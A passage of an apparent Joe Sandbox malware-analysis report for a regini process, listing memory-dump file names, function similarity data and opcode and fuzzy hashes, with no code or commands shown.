                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: ed9ceeb4faa41433a514d93a05f7be91a880419cfd4d04cf4fb5a2b0caab7ae7
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: A3918372E00206DBEB26DE69C8A46FEF7A5AF88764F54451AE856EB3C0D7308D40CB54
                                                                                                              Function 02D79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 8dda07bbbb569e06c2dd4fd39aeb1c5afb1d0b7f6dbf2d36a3838be2e75ada78
                                                                                                              • Instruction ID: 3b4acb65b6a823b55c8cab803fafbedd0fd99da0c9414505f16192106dc7d7cd
                                                                                                              • Opcode Fuzzy Hash: 8dda07bbbb569e06c2dd4fd39aeb1c5afb1d0b7f6dbf2d36a3838be2e75ada78
                                                                                                              • Instruction Fuzzy Hash: 31812C76D002699BDB31DB54CC54BEEB7B8AB08754F0041DAEA19B7350E7349E84CFA0